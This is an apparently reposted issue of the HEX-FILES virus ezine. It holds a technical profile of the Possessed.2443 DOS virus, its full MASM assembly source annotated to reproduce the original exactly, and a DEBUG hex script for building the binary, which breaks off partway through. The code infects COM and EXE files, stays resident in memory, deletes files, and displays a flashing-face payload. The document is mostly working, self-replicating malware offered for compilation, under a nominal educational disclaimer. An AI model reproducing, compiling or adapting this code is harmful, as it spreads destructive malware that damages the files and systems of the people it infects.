Copy Link
Add to Bookmark
Report

Hexfiles Issue 2 File 007

eZine's profile picture
Published in 
hexfiles
 · 4 months ago

  
HEX-FILES No. 2 File 007
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

Virus: Possessed.2443
Alias: Possessed 1.05, Possessed I
Targets: COM, EXE

Resident: Low Memory TSR
MemorySize: 2944 bytes + environment
MemorySelfRec: [0:1EC] <> 0

VirusLength: 2443 bytes
InfectiveLength:
COM: 2443 bytes
EXE: 2443 + 15 byte alignment
LocationVirusOnFile:
End of file
FileSelfRec:
COM: (File[Eof-1067..Eof-1066] = 41h 4bh) and
(File[16..81] = Virus[8..73])
EXE: File[18..19] = 70h 19h
ReadableText:
"POSSESSED! Bwa! ha! ha! ha! ha!$
Author: JonJon Gumba of AdU"

"C:*.COM", "C:*.EXE" <--- drive letters varies
EncryptedText:
"POSSESSED! Bwa! ha! ha! ha! ha!$
Author: JonJon Gumba of AdU"

"COMMAND.COM"
DisplayedText:
If host program EXEC failed

"POSSESSED! Bwa! ha! ha! ha! ha!"

Payload: Flashing face
PayloadTrigger: After 11 hours if it became resident through COMMAND.COM;
3 hours from other programs




ÄÄ POS2443.ASM STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

;-------------------------------------------------------------------
; *WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*
; *WARNING WARNING*
; *WARNING destructive codes intentional damage WARNING*
; *WARNING deletes files WARNING*
; *WARNING WARNING*
; *WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*
;-------------------------------------------------------------------
; Virus: Possessed.2443
; Alias: Possessed 1.05, Possessed II
; Author: JonJon Gumba
; Origin: Adamson University, Manila, Philippines
;-------------------------------------------------------------------
;
; This source code is written in a way so that when compiled you will
; get an exact copy of the virus.
;
; You will only be able to duplicate the original virus if you will
; use *MASM 5.0* to compile this program listing. Other compilers or
; versions of a compiler might produce a virus different from that
; originally released.
;
; If compiled in tasm 2.01, two bytes will differ from the original
; virus, that is, compiled by masm 5.0 This can also be compiled
; in a86 4.02 but you will be creating a new variant.
;
; Compile to COM.
;
;-------------------------------------------------------------------
; Program listing created by Putoksa Kawayan. HEX-FILES No. 2
;-------------------------------------------------------------------
;
ExeHeader struc
isExeId dw ?
isMod dw ?
isBlocks dw ?
isRelocItemCt dw ?
isHeaderSize dw ?
isMinAlloc dw ?
isMaxAlloc dw ?
isSs dw ?
isSp dw ?
isCxSum dw ?
isIp dw ?
isCs dw ?
ExeHeader ends

Possessed segment 'code'
assume cs:Possessed, ds:nothing

org 0

MemoryMarkerLoc equ 01ech
SaveSsOnInt21 equ 01f6h
SaveSpOnInt21 equ 01f4h

PossessedEntry:
push es
xor ax,ax
mov es,ax
jmp FirstGenerationEntry

PossessedId db 13,'POSSESSED! Bwa! ha! ha! ha! ha!$',8,32,10
db 13,'Author: JonJon Gumba of AdU',10,26

isDos:
jmp DosHandler

DosVersion db ?
FirstGenerationFlag db 1
DosInterrupt label dword
DosIntOffset dw ?
DosIntSegment dw ?
ClockInterrupt label dword
ClockIntOffset dw ?
ClockIntSegment dw ?
ErrorIntOffset dw ?
ErrorIntSegment dw ?
VictimAsciizSegment dw ?
VictimAsciizOffset dw ?
Attribute dw ?
Handle dw ?
FileTime dw ?
FileDate dw ?
ComLength dw ?
AllocatedMemory dw ?
Timer dw ?
Hour db ?
ActivateLength db ?
ViruSs dw ?
ViruSp dw ?
ExeSs dw ?
ExeSp dw ?
ExeCs dw ?
ExeIp dw ?
ExeLengthLo dw ?
ExeLengthHi dw ?
Environment dw ?
Psp dw ?

DosHandler:
pushf
cmp ax,4b00h
jne PassToDos
push ds
push es
push si
push di
push ax
push bx
push cx
push dx
mov bx,dx
mov bl,[bx]

assume cs:Possessed, ds:Possessed

push cs
pop ds
mov ComAsciiz,bl
mov ExeAsciiz,bl
mov ah,2fh
call UseDos
push es
push bx
mov ah,1ah
mov dx,offset SaveVictimCode
call UseDos
mov cx,21h
mov dx,offset ComAsciiz
mov ah,4eh
call UseDos
jnc InfectOthersFirst
mov dx,offset ExeAsciiz
mov ah,4eh
call UseDos
jnc InfectOthersFirst
InfectExecutingProgram:
pop dx
pop ds
mov ah,1ah
call UseDos
pop dx
pop cx
pop bx
pop ax
pop di
pop si
pop es
pop ds
call SaveRegistersBeforeInfect
jmp PassToDos
InfectOthersFirst:
mov dx,offset SaveVictimCode
add dx,28
mov bx,dx
mov cl,ComAsciiz
mov [bx],cl
mov byte ptr [bx+01],':'
call SaveRegistersBeforeInfect
jmp InfectExecutingProgram
SaveRegistersBeforeInfect:
push ds
push es
push si
push di
push ax
push bx
push cx
push dx
jmp SetInfect

assume cs:Possessed, ds:nothing

RestoreRegisters:
pop dx
pop cx
pop bx
pop ax
pop di
pop si
pop es
pop ds
ret
PassToDos:
popf
jmp DosInterrupt
SetInfect:
mov VictimAsciizSegment,ds
mov VictimAsciizOffset,dx
mov si,dx
add si,2
mov bx,si
CheckIfPathSeparator:
cmp byte ptr [si],'\'
jne CheckIfEndOfFileName
mov bx,si
inc bx
jmp CheckNextCharOfFileName
CheckIfEndOfFileName:
cmp byte ptr [si],0
je GotEndOfFileName
CheckNextCharOfFileName:
inc si
jmp CheckIfPathSeparator
RestoreErrorInterrupt:
mov ax,2524h
mov dx,ErrorIntOffset
mov ds,ErrorIntSegment
call UseDos
jmp RestoreRegisters
GotEndOfFileName:
mov si,bx
push cs
pop es
mov di,offset NameofVictim
mov cx,13
cld
repe movsb

assume cs:Possessed, ds:Possessed

push ds
push dx
push es
pop ds
mov ax,3524h
call UseDos
mov ErrorIntSegment,es
mov ErrorIntOffset,bx
mov ax,2524h
mov dx,offset isError
call UseDos

assume cs:Possessed, ds:nothing

pop dx
pop ds
mov ax,4300h
call UseDos
Relay1:
jc RestoreErrorInterrupt
mov Attribute,cx
mov ax,4301h
mov cx,20h
call UseDos
jc Relay1
mov ax,3d02h
call UseDos
jc Relay1
mov Handle,ax
mov bx,ax
mov ax,5700h
call UseDos
mov FileDate,dx
mov FileTime,cx
mov bx,-2
mov ah,48h
call UseDos
jnc EnoughMemory
mov ah,48h
call UseDos
jc Relay1
EnoughMemory:
mov AllocatedMemory,ax
xor cx,cx
mov dx,cx
mov bx,Handle
mov ax,4202h
call UseDos
jc Relay12
mov ComLength,ax
call MovePointerBegin
Relay12:
jc Relay11
mov cx,ComLength
xor dx,dx
mov ds,AllocatedMemory
mov ah,3fh
call UseDos
Relay11:
jc DoneWithFile
push cs
pop es
xor si,si
cmp word ptr [si],'ZM'
jne InfectCheckCom
cmp word ptr [si].isCxSum,1970h
je DoneWithFile
jmp NotInfected
InfectCheckCom:
mov si,cx
sub si,(offset VirusStack-offset FaceData)
js Relay2
cmp word ptr [si],4b41h
je VerifyComInfection
Relay2:
jmp NotInfected

VerifyComInfection:
mov si,16
mov di,offset PossessedId
mov cx,(isDos-PossessedId)/2
cld
repe cmpsw
je DoneWithFile
jmp DeleteFile

DoneWithFile:
mov es,AllocatedMemory
mov ah,49h
call UseDos
mov bx,Handle
mov dx,FileDate
mov cx,FileTime
mov ax,5701h
call UseDos
mov ah,3eh
call UseDos
mov ds,VictimAsciizSegment
mov dx,VictimAsciizOffset
mov cx,Attribute
mov ax,4301h
call UseDos
jmp RestoreRegisters

NotInfected:
push es
mov ds,VictimAsciizSegment
mov si,VictimAsciizOffset
mov dl,[si]
sub dl,'A'-1

assume cs:Possessed, ds:Possessed

pop ds
mov ActivateLength,3
mov si,offset EncryptedCommandCom
mov cx,11
mov al,17h
call Scrambler
mov di,offset NameofVictim
call Compare
pushf
neg al
call Scrambler
popf
jc CheckDiskSpace
cmp DosVersion,3
jnc SetActivateFromCommand
Relay3:
jmp DoneWithFile

SetActivateFromCommand:
mov ActivateLength,11
jmp EnoughDiskSpace

assume cs:Possessed, ds:nothing

CheckDiskSpace:
mov ah,36h
call UseDos
xor dx,dx
mul bx
mul cx
or dx,dx
jne EnoughDiskSpace
cmp ax,2500
jnc EnoughDiskSpace
jmp DeleteFile

EnoughDiskSpace:
mov bx,Handle
call MovePointerBegin
jc Relay3
mov ds,AllocatedMemory
xor si,si
cmp word ptr [si],'ZM'
jne isComFile
jmp isExeFile

Jumper:
mov bx,cs:[100h+(LocComEntry-Jumper)]
mov si,cs:[100h+(LocEndOfFile-Jumper)]
jmp bx

LocComEntry dw ?
LocEndOfFile dw ?

assume cs:Possessed, ds:Possessed

isComFile:
push ds
push ds
mov di,offset SaveVictimCode
mov cx,(offset VirusStack-offset SaveVictimCode)/2
cld
repe movsw
pop es
push cs
pop ds
mov dx,ComLength
cmp ActivateLength,11
jne ComNotCommand
mov LocEndOfFile,dx
sub dx,-((ComEntry-VirusStack)+100h) ;ffa3
mov LocComEntry,dx
jmp JumperSet

ComNotCommand:
push dx
add dx,offset ComEntry+100h
mov LocComEntry,dx
pop dx
add dx,offset VirusStack
mov LocEndOfFile,dx
JumperSet:
mov si,offset Jumper
xor di,di
mov cx,(isComFile-Jumper)/2
cld
repe movsw
mov si,offset PossessedId
mov cx,(isDos-PossessedId)/2
cld
repe movsw
call MovePointerBegin

assume cs:Possessed, ds:nothing

pop ds
mov cx,ComLength
cmp ActivateLength,11
jne NotCommandCom
sub cx,offset VirusStack
NotCommandCom:
xor dx,dx
mov ah,40h
call UseDos
jnc WriteOk
Relay4:
jmp Relay3

WriteOk:
push cs
pop ds
mov dx,offset PossessedEntry
mov cx,offset VirusStack
mov ah,40h
call UseDos
jc Relay4
jmp DoneWithFile

DeleteFile:
mov ds,VictimAsciizSegment
mov dx,VictimAsciizOffset
mov ah,41h
call UseDos
jmp DoneWithFile

PixelRow equ Environment+100h
PixelColumn equ Psp+100h

isClock:
pushf
inc Timer
jne NotYetTime
dec Hour
je ShowTime
NotYetTime:
popf
jmp ClockInterrupt

ShowTime:
popf
mov ax,6
int 10h

assume cs:Possessed, ds:Possessed

push cs
pop ds
xor bx,bx
xor dx,dx
LoadFaceData:
mov si,offset FaceData
mov word ptr PixelRow,200
mov word ptr PixelColumn,0
call ShowPayload
mov word ptr PixelRow,201
mov word ptr PixelColumn,1
call ShowPayload
mov word ptr PixelRow,189
mov word ptr PixelColumn,-1
call ShowPayload
mov word ptr PixelRow,201
mov word ptr PixelColumn,-1
call ShowPayload
mov word ptr PixelRow,189
mov word ptr PixelColumn,1
call ShowPayload
jmp LoadFaceData
ShowPayload:
push si
mov al,1
mov cx,2
EraseFace:
push cx
push si
SetNextCoordinate:
mov bl,[si]
or bl,bl
je EndFaceData
mov cx,bx
add cx,PixelRow
mov dl,[si+1]
add dx,PixelColumn
mov ah,0ch
int 10h
add si,2
jmp SetNextCoordinate

EndFaceData:
pop si
xor al,al
pop cx
loop EraseFace
pop si
ret

assume cs:Possessed, ds:nothing

isExeFile:
mov word ptr [si].isCxSum,1970h
mov ax,[si].isSs
add ax,16
mov ExeSs,ax
mov ax,[si].isSp
mov ExeSp,ax
mov ax,[si].isIp
mov ExeIp,ax
mov ax,[si].isCs
add ax,16
mov ExeCs,ax
mov ax,[si].isBlocks
cmp word ptr [si].isMod,0
je PageAligned
dec ax
PageAligned:
mov bx,512
mul bx
add ax,[si].isMod
adc dx,0
add ax,15
adc dx,0
and ax,0fff0h
mov ExeLengthLo,ax
mov ExeLengthHi,dx
add ax,offset VirusStack
adc dx,0
jc Relay5
div bx
or dx,dx
je AlignedToPage
inc ax
AlignedToPage:
mov [si].isBlocks,ax
mov [si].isMod,dx
mov ax,ExeLengthLo
mov dx,ExeLengthHi
mov bx,16
div bx
sub ax,[si].isHeaderSize
sub ax,16
mov [si].isCs,ax
mov word ptr [si].isIp,offset ExeEntry+100h
mov [si].isSs,ax
mov word ptr [si].isSp,offset VirusStack+100h
mov bx,Handle
call MovePointerBegin
mov cx,28
xor dx,dx
mov ah,40h
call UseDos

assume cs:Possessed, ds:Possessed

push cs
pop ds
mov dx,ExeLengthLo
mov cx,ExeLengthHi
mov ax,4200h
call UseDos
mov dx,offset PossessedEntry
mov cx,offset VirusStack
mov ah,40h
call UseDos
Relay5:
jmp DoneWithFile

assume cs:Possessed, ds:nothing

isError:
xor ax,ax
mov es,ax
mov ss,es:SaveSsOnInt21
mov sp,es:SaveSpOnInt21
pop ax
pop es
pop bp
stc
ret

UseDos:
push bp
push es
push ax
xor ax,ax
mov es,ax
mov es:SaveSpOnInt21,sp
mov es:SaveSsOnInt21,ss
pop ax
pop es
pushf
call DosInterrupt
pop bp
ret

MovePointerBegin:
xor cx,cx
mov dx,cx
mov ax,4200h
call UseDos
ret

MoveCursor:
mov ah,2
xor bx,bx
int 10h
ret

Scrambler:
push cx
push si
Masker:
sub [si],al
inc si
loop Masker
pop si
pop cx
ret

Compare:
push si
push cx
cld
repe cmpsb
je MatchFound
stc
MatchFound:
pop cx
pop si
ret

EncryptedCommandCom db 'C'+17h,'O'+17h,'M'+17h,'M'+17h,'A'+17h
db 'N'+17h,'D'+17h,'.'+17h,'C'+17h,'O'+17h
db 'M'+17h

EncryptedPossessedId db 13+25h,'P'+25h,'O'+25h,'S'+25h,'S'+25h
db 'E'+25h,'S'+25h,'S'+25h,'E'+25h,'D'+25h
db '!'+25h,' '+25h,'B'+25h,'w'+25h,'a'+25h
db '!'+25h,' '+25h,'h'+25h,'a'+25h,'!'+25h
db ' '+25h,'h'+25h,'a'+25h,'!'+25h,' '+25h
db 'h'+25h,'a'+25h,'!'+25h,' '+25h,'h'+25h
db 'a'+25h,'!'+25h,'$'+25h,8+25h,32+25h,10+25h
db 13+25h,'A'+25h,'u'+25h,'t'+25h,'h'+25h
db 'o'+25h,'r'+25h,':'+25h,' '+25h,'J'+25h
db 'o'+25h,'n'+25h,'J'+25h,'o'+25h,'n'+25h
db ' '+25h,'G'+25h,'u'+25h,'m'+25h,'b'+25h
db 'a'+25h,' '+25h,'o'+25h,'f'+25h,' '+25h
db 'A'+25h,'d'+25h,'U'+25h,10+25h,26+25h

;----------------------------
;--------------Possessed payload data
;----------------------------
FaceData label byte
db 41h,4bh,42h,4bh,42h,4ch,43h,4ch,44h,4ch,45h,4ch,43h,4dh,46h
db 4dh,47h,4dh,44h,4eh,48h,4eh,49h,4eh,4ah,4eh,45h,4fh,4bh,4fh
db 4ch,4fh,0b6h,4ah,0b5h,4ah,0b5h,4bh,0b4h,4bh,0b3h,4bh,0b2h,4bh,0b4h
db 4ch,0b1h,4ch,0b0h,4ch,0b3h,4dh,0afh,4dh,0aeh,4dh,0adh,4dh,0b2h,4eh
db 0ach,4eh,0abh,4eh,4ch,54h,4ch,55h,4dh,55h,4eh,55h,4fh,56h,50h
db 56h,51h,56h,52h,56h,53h,56h,54h,57h,55h,57h,56h,57h,57h,57h
db 58h,57h,59h,58h,5ah,58h,5bh,58h,5ch,58h,5dh,58h,5ah,59h,5bh
db 59h,5ch,59h,5dh,59h,60h,59h,5fh,59h,60h,59h,61h,59h,62h,59h
db 5bh,5ah,5ch,5ah,63h,5ah,64h,5ah,65h,5ah,66h,5ah,67h,5ah,5ch
db 5bh,68h,5bh,69h,5bh,6ah,5bh,6bh,5bh,6ch,5bh,6dh,5ch,6eh,5ch
db 6fh,5ch,70h,5dh,0b1h,53h,0b0h,54h,0afh,54h,0aeh,54h,0adh,55h,0ach
db 55h,0abh,55h,0aah,55h,0a9h,55h,0a8h,55h,0a7h,56h,0a6h,56h,0a5h,56h
db 0a4h,56h,0a3h,56h,0a2h,57h,0a1h,57h,0a0h,57h,9fh,57h,9eh,57h,9dh
db 57h,9ch,58h,9bh,58h,9ah,58h,99h,58h,98h,58h,9ah,59h,99h,59h
db 98h,59h,97h,59h,96h,59h,95h,59h,94h,59h,93h,59h,92h,59h,99h
db 5ah,98h,5ah,91h,5ah,90h,5ah,8fh,5ah,8eh,5ah,8dh,5ah,98h,5bh
db 8ch,5bh,8bh,5bh,8ah,5bh,89h,5bh,88h,5bh,87h,5bh,86h,5ch,85h
db 5ch,84h,5ch,83h,5ch,76h,63h,75h,64h,75h,65h,74h,66h,74h,67h
db 73h,68h,73h,69h,72h,6ah,71h,6bh,71h,6ch,70h,6dh,70h,6eh,6fh
db 6fh,6eh,70h,6eh,71h,7bh,71h,6dh,72h,7ah,72h,79h,72h,6dh,73h
db 78h,73h,77h,73h,76h,73h,75h,73h,6ch,74h,71h,74h,72h,74h,73h
db 74h,74h,74h,6ch,75h,6dh,75h,6eh,75h,6fh,75h,70h,75h,6bh,76h
db 6ch,76h,6dh,81h,6eh,81h,6fh,81h,70h,80h,71h,80h,72h,80h,73h
db 80h,74h,7fh,75h,7fh,76h,7fh,77h,7fh,78h,7eh,79h,7eh,7ah,7eh
db 7bh,7eh,7ch,7dh,7dh,7dh,7eh,7dh,7fh,7dh,80h,7dh,81h,7ch,82h
db 7ch,83h,7ch,84h,7ch,85h,7bh,86h,7bh,87h,7bh,88h,7bh,89h,7ah
db 8ah,7ah,8bh,7ah,8ch,7ah,8dh,79h,8eh,79h,8fh,79h,90h,79h,91h
db 78h,92h,78h,93h,78h,94h,77h,95h,77h,96h,76h,97h,76h,98h,75h,0

ComAsciiz db 'C:*.COM',0
ExeAsciiz db 'C:*.EXE',0

ExeEntry:
push es
xor ax,ax
mov es,ax
cmp byte ptr es:MemoryMarkerLoc,0
jne ExecuteExeVictim
mov si,100h
jmp ExeNotInMemory

ExecuteExeVictim:
pop es
mov ax,es
add ax,ExeSs+100h
mov ss,ax
mov sp,ExeSp+100h
mov ax,es
add ax,ExeCs+100h
mov DosIntSegment+100h,ax
mov ax,ExeIp+100h
mov DosIntOffset+100h,ax
clc
jmp DosInterrupt+100h

SecondCodeMove:
cld
repe movsb
xor ax,ax
mov es,ax
FirstGenerationEntry:
mov byte ptr es:MemoryMarkerLoc,1
pop ax
add ax,16
push ax
mov ax,offset SetUpPossessed
push ax
retf

assume cs:Possessed, ds:Possessed

SetUpPossessed:
mov ax,sp
sub ax,100h
mov sp,ax
mov ax,cs
mov ds,ax
mov ss,ax
push ds
sub ax,16
mov es,ax
mov Psp,es
push ax
mov ax,es:[2ch]
mov Environment,ax
pop ax
push ds
push es
mov ds,ax
push cs
pop es
mov si,0ah
mov di,offset VirusStack
mov cx,6
cld
repe movsw
mov bx,offset isTerminate
mov ds:[0ah],bx
mov ds:[0ch],cs
pop es
pop ds
pop es
mov si,offset EncryptedPossessedId
mov cx,(FaceData-EncryptedPossessedId)
push cx
mov al,25h
call Scrambler
mov di,offset PossessedId
push si
cld
repe movsb
pop si
pop cx
neg al
call Scrambler
mov ax,word ptr ExeEntry
add ax,(3521h-3306h)
int 21h
mov DosIntOffset,bx
mov DosIntSegment,es
mov dx,offset isDos
sub ah,10h
call UseDos
mov Timer,0
mov dl,ActivateLength
mov Hour,dl
add ax,(3508h-2521h)
call UseDos
mov ClockIntOffset,bx
mov ClockIntSegment,es
mov dx,offset isClock
sub ah,10h
call UseDos
push cs
pop ds
mov es,Psp
mov ah,49h
call UseDos
mov dx,offset VirusStack
mov cl,4
shr dx,cl
add dx,20h
mov ah,31h
call UseDos
isTerminate:
push cs
push cs
pop ds
mov es,Psp
mov si,offset VirusStack
mov di,0ah
mov cx,6
cld
repe movsw
pop es
cmp FirstGenerationFlag,1
jne NotFirstGen
mov FirstGenerationFlag,0
jmp GetReturnCode

NotFirstGen:
mov ax,Psp
mov si,offset ExecParam
mov [si+4],ax
mov word ptr [si+2],80h
mov [si+8],ax
mov word ptr [si+6],5ch
mov [si+12],ax
mov word ptr [si+10],6ch
mov ax,Environment
mov [si],ax
mov ah,30h
int 21h
mov DosVersion,al
cmp al,3
jc NameNotInEnvironment
mov ds,Environment
xor si,si
mov cx,200
FindFileName:
cmp byte ptr [si],1
jne CheckNextChar
cmp byte ptr [si+3],':'
jne CheckNextChar
mov dx,si
add dx,2
jmp FoundFileName

CheckNextChar:
inc si
loop FindFileName
NameNotInEnvironment:
push cs
pop ds
mov si,offset NameofVictim
mov di,offset VirusAsciiz
mov cx,13
cld
repe movsb
mov dx,offset VirusAsciiz

assume cs:Possessed, ds:nothing

FoundFileName:
cli
mov ViruSs,ss
mov ViruSp,sp
sti
mov ax,4b00h
mov bx,offset ExecParam
cmp DosVersion,3
jc OldDos
call UseDos
jmp VictimExecuted
OldDos:
int 21h

VictimExecuted:
cli
mov ss,ViruSs
mov sp,ViruSp
sti
push cs
pop ds
jnc GetReturnCode
mov dx,offset PossessedId
mov ah,9
int 21h
GetReturnCode:
mov ah,4dh
int 21h
mov ah,4ch
int 21h

NameofVictim db 13 dup (?)

ComEntry:
add si,100h
push es
xor ax,ax
mov es,ax
cmp word ptr es:MemoryMarkerLoc,0
je NotInMemory
pop es
sub si,5ah
mov di,100h
mov cx,(offset VirusStack-offset SaveVictimCode)/2
cld
repe movsw
mov bx,100h
clc
jmp bx

NotInMemory:
sub si,offset VirusStack
ExeNotInMemory:
pop es

assume cs:Possessed, ds:Possessed

push cs
pop ds
mov di,100h
mov cx,offset ExeNotInMemory
shr cx,1
cld
repe movsw
mov cx,(offset VirusStack-offset ExeNotInMemory)
mov DosIntSegment+100h,es
mov DosIntOffset+100h,offset SecondCodeMove+100h
push es
jmp cs:DosInterrupt+100h


SaveVictimCode db 90 dup (?)
VirusStack dw ?
VirusAsciiz db 13 dup (?)
ExecParam dw 7 dup (?)

Possessed ends

end PossessedEntry

ÄÄ POS2443.ASM ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


ÄÄ POS2443.SCR STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

N POS2443.COM
E 0100 2E 8B 1E 0C 01 2E 8B 36 0E 01 FF E3 AF 0B 52 0B
E 0110 0D 50 4F 53 53 45 53 53 45 44 21 20 42 77 61 21
E 0120 20 68 61 21 20 68 61 21 20 68 61 21 20 68 61 21
E 0130 24 08 20 0A 0D 41 75 74 68 6F 72 3A 20 4A 6F 6E
E 0140 4A 6F 6E 20 47 75 6D 62 61 20 6F 66 20 41 64 55
E 0150 0A 1A 73 2E 0D 0A 42 72 6F 75 67 68 74 20 74 6F
E 0160 20 79 6F 75 20 6C 69 76 65 20 62 79 20 48 45 58
E 0170 2D 46 49 4C 45 53 20 4E 6F 2E 20 32 0D 0A 0A 48
E 0180 45 58 2D 46 49 4C 45 53 20 61 6E 64 20 50 75 74
E 0190 6F 6B 73 61 20 4B 61 77 61 79 61 6E 20 61 72 65
E 01A0 20 6E 6F 74 20 72 65 73 70 6F 6E 73 69 62 6C 65
E 01B0 20 66 6F 72 20 61 63 74 75 61 6C 2C 20 69 6D 70
E 01C0 6C 69 65 64 20 61 6E 64 2F 6F 72 0D 0A 69 6D 61
E 01D0 67 69 6E 61 72 79 20 64 61 6D 61 67 65 20 62 72
E 01E0 6F 75 67 68 74 20 61 62 6F 75 74 20 62 79 20 74
E 01F0 68 65 20 75 73 65 2C 20 6D 69 73 75 73 65 20 6F
E 0200 72 20 6E 6F 6E 2D 75 73 65 20 6F 66 20 74 68 69
E 0210 73 20 76 69 72 69 69 2E 20 54 68 65 0D 0A 70 65
E 0220 72 73 6F 6E 20 77 68 6F 20 65 78 65 63 75 74 65
E 0230 73 20 74 68 69 73 20 76 69 72 69 69 20 62 65 61
E 0240 72 73 20 66 75 6C 6C 20 72 65 73 70 6F 6E 73 69
E 0250 62 69 6C 69 74 79 20 66 6F 72 20 68 69 73 2F 68
E 0260 65 72 20 61 63 74 69 6F 6E 73 2E 0D 0A 0A 54 68
E 0270 69 73 20 76 69 72 69 69 20 69 73 20 73 74 72 69
E 0280 63 74 6C 79 20 66 6F 72 20 65 64 75 63 61 74 69
E 0290 6F 6E 61 6C 20 61 6E 64 2F 6F 72 20 72 65 73 65
E 02A0 61 72 63 68 20 70 75 72 70 6F 73 65 73 20 6F 6E
E 02B0 6C 79 2E 0D 0A 0A 24 08 20 1A 0E 1F BA 07 01 B4
E 02C0 09 CD 21 B4 4C CD 21 06 33 C0 8E C0 E9 4F 07 0D
E 02D0 50 4F 53 53 45 53 53 45 44 21 20 42 77 61 21 20
E 02E0 68 61 21 20 68 61 21 20 68 61 21 20 68 61 21 24
E 02F0 08 20 0A 0D 41 75 74 68 6F 72 3A 20 4A 6F 6E 4A
E 0300 6F 6E 20 47 75 6D 62 61 20 6F 66 20 41 64 55 0A
E 0310 1A EB 37 90 06 00 4A 00 C5 0D 2E 03 C5 0D BE 04
E 0320 A3 0E 08 04 35 05 20 00 05 00 EE 21 68 24 C7 01
E 0330 4C 0F 7A 01 03 03 08 04 0A 06 00 00 00 00 00 00
E 0340 00 00 00 00 00 00 8D 0E 93 0E 9C 3D 00 4B 75 7C
E 0350 1E 06 56 57 50 53 51 52 8B DA 8A 1F 0E 1F 88 1E
E 0360 05 07 88 1E 0D 07 B4 2F E8 2D 04 06 53 B4 1A BA
E 0370 31 09 E8 23 04 B9 21 00 BA 05 07 B4 4E E8 18 04
E 0380 73 1F BA 0D 07 B4 4E E8 0E 04 73 15 5A 1F B4 1A
E 0390 E8 05 04 5A 59 5B 58 5F 5E 07 1F E8 1A 00 EB 2C
E 03A0 90 BA 31 09 83 C2 1C 8B DA 8A 0E 05 07 88 0F C6
E 03B0 47 01 3A E8 02 00 EB D4 1E 06 56 57 50 53 51 52
E 03C0 EB 10 90 5A 59 5B 58 5F 5E 07 1F C3 9D 2E FF 2E
E 03D0 4F 00 2E 8C 1E 5B 00 2E 89 16 5D 00 8B F2 83 C6
E 03E0 02 8B DE 80 3C 5C 75 06 8B DE 43 EB 06 90 80 3C
E 03F0 00 74 15 46 EB ED B8 24 25 2E 8B 16 57 00 2E 8E
E 0400 1E 59 00 E8 92 03 EB BB 8B F3 0E 07 BF DB 08 B9
E 0410 0D 00 FC F3 A4 1E 52 06 1F B8 24 35 E8 79 03 8C
E 0420 06 59 00 89 1E 57 00 B8 24 25 BA BE 04 E8 68 03
E 0430 5A 1F B8 00 43 E8 60 03 72 BC 2E 89 0E 5F 00 B8
E 0440 01 43 B9 20 00 E8 50 03 72 EE B8 02 3D E8 48 03
E 0450 72 E6 2E A3 61 00 8B D8 B8 00 57 E8 3A 03 2E 89
E 0460 16 65 00 2E 89 0E 63 00 BB FE FF B4 48 E8 28 03
E 0470 73 07 B4 48 E8 21 03 72 BF 2E A3 69 00 33 C9 8B
E 0480 D1 2E 8B 1E 61 00 B8 02 42 E8 0C 03 72 07 2E A3
E 0490 67 00 E8 1E 03 72 11 2E 8B 0E 67 00 33 D2 2E 8E
E 04A0 1E 69 00 B4 3F E8 F0 02 72 36 0E 07 33 F6 81 3C
E 04B0 4D 5A 75 0A 81 7C 12 70 19 74 25 EB 5F 90 8B F1
E 04C0 81 EE 2B 04 78 06 81 3C 41 4B 74 03 EB 4E 90 BE
E 04D0 10 00 BF 08 00 B9 21 00 FC F3 A7 74 03 E9 3F 01
E 04E0 2E 8E 06 69 00 B4 49 E8 AE 02 2E 8B 1E 61 00 2E
E 04F0 8B 16 65 00 2E 8B 0E 63 00 B8 01 57 E8 99 02 B4
E 0500 3E E8 94 02 2E 8E 1E 5B 00 2E 8B 16 5D 00 2E 8B
E 0510 0E 5F 00 B8 01 43 E8 7F 02 E9 A7 FE 06 2E 8E 1E
E 0520 5B 00 2E 8B 36 5D 00 8A 14 80 EA 40 1F C6 06 6E
E 0530 00 03 BE 13 05 B9 0B 00 B0 17 E8 88 02 BF DB 08
E 0540 E8 8C 02 9C F6 D8 E8 7C 02 9D 72 11 80 3E 4D 00
E 0550 03 73 02 EB 8B C6 06 6E 00 0B EB 18 90 B4 36 E8
E 0560 36 02 33 D2 F7 E3 F7 E1 0B D2 75 08 3D C4 09 73
E 0570 03 E9 AB 00 2E 8B 1E 61 00 E8 37 02 72 D5 2E 8E
E 0580 1E 69 00 33 F6 81 3C 4D 5A 75 13 E9 40 01 2E 8B
E 0590 1E 0C 01 2E 8B 36 0E 01 FF E3 AF 0B 52 0B 1E 1E
E 05A0 BF 31 09 B9 2D 00 FC F3 A5 07 0E 1F 8B 16 67 00
E 05B0 80 3E 6E 00 0B 75 0F 89 16 D5 02 81 EA A3 FF 89
E 05C0 16 D3 02 EB 13 90 52 81 C2 E8 09 89 16 D3 02 5A
E 05D0 81 C2 8B 09 89 16 D5 02 BE C7 02 33 FF B9 08 00
E 05E0 FC F3 A5 BE 08 00 B9 21 00 FC F3 A5 E8 C4 01 1F
E 05F0 2E 8B 0E 67 00 2E 80 3E 6E 00 0B 75 04 81 E9 8B
E 0600 09 33 D2 B4 40 E8 90 01 73 03 E9 46 FF 0E 1F BA
E 0610 00 00 B9 8B 09 B4 40 E8 7E 01 72 EE E9 C1 FE 2E
E 0620 8E 1E 5B 00 2E 8B 16 5D 00 B4 41 E8 6A 01 E9 AF
E 0630 FE 9C 2E FF 06 6B 00 75 07 2E FE 0E 6D 00 74 06
E 0640 9D 2E FF 2E 53 00 9D B8 06 00 CD 10 0E 1F 33 DB
E 0650 33 D2 BE 60 05 C7 06 7F 01 C8 00 C7 06 81 01 00
E 0660 00 E8 3E 00 C7 06 7F 01 C9 00 C7 06 81 01 01 00
E 0670 E8 2F 00 C7 06 7F 01 BD 00 C7 06 81 01 FF FF E8
E 0680 20 00 C7 06 7F 01 C9 00 C7 06 81 01 FF FF E8 11
